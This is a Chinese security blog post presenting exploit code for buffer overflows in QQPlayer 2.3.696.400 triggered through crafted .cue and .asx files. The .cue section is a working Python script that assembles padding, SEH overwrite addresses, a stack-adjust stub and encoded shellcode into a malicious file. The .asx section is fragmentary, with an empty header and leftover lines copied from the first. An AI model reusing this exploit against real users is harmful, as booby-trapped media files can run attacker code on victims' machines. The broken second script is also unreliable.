凌风[0x0F]'s BloG

Enjoy In Hacking

黑客在线工具 联系方式 移到底部 登录
QQPlayerCUE文件缓冲区溢出漏洞

QQPlayerCUE文件缓冲区溢出漏洞

Title: QQPlayer cue File Buffer Overflow Exploit

Author: Lufeng Li of Neusoft Corporation

Vendor: www.qq.com

Platform: Windows XPSP3 Chinese Simplified

Tested: QQPlayer 2.3.696.400

Vulnerable: QQPlayer<=2.3.696.400p1
 

程序代码

head = ”’FILE “”’

junk = “A” * 780

nseh =”\x42\x61\x21\x61″

seh  =”\xa9\x9e\x41\x00″

adjust=”\x32\x42\x61\x33\xca\x83\xc0\x10″

shellcode=(“hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o”

“0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41″

“H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK”

“NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01″)

junk_=”R”*8000

foot =”’.avi” VIDEO”’+”\x0a””’TRACK 02 MODE1/8888”’+”\x0a”+”INDEX 08 08:08:08″

payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open(“poc.cue”,”w”)

fobj.write(payload)

=====================我是分割线=========================

QQPlayer asx文件处理缓冲区溢出漏洞

Title: QQPlayer asx File Processing Buffer Overflow Exploit

Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University

Vendor: www.qq.com

Platform: Windows XPSP3 Chinese Simplified

Test: QQPlayer 2.3.696.400

Vulnerable: QQPlayer< =2.3.696.400p1

Payload = calc

head =”””

payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open(“poc.asx”,”w”)

fobj.write(payload)

fobj.close()

[微博礼仪规范]

微博礼仪规范

我们真诚地欢迎光临本微博的每一位网友,但是这里需要一个文明、健康的互动环境。为此,我们希望:

  • 1、遵守国家法律,请不要发布违反国家法律的内容;
  • 2、遵守社会公德,请不要使用不文明字词作为个人昵称,发布消息攻击、谩骂他人;
  • 3、避免信息垃圾,请不要在短时间内反复发布同一条消息; 请不要发布、传播谣言;

在微博里,收听的权力在听众手里,如果您的行为让他人不适,最终将会让你失去所有听众。

来,说说你在做什么,想什么



验证码

 
 

博主:0x0F

专注于WEB安全,寻志同道合的朋友一起交流技术。QQ:unMD5(50a9780c2be657b465f74e56f1d6e429)

我的话题

最新广播

我的收藏

腾讯微博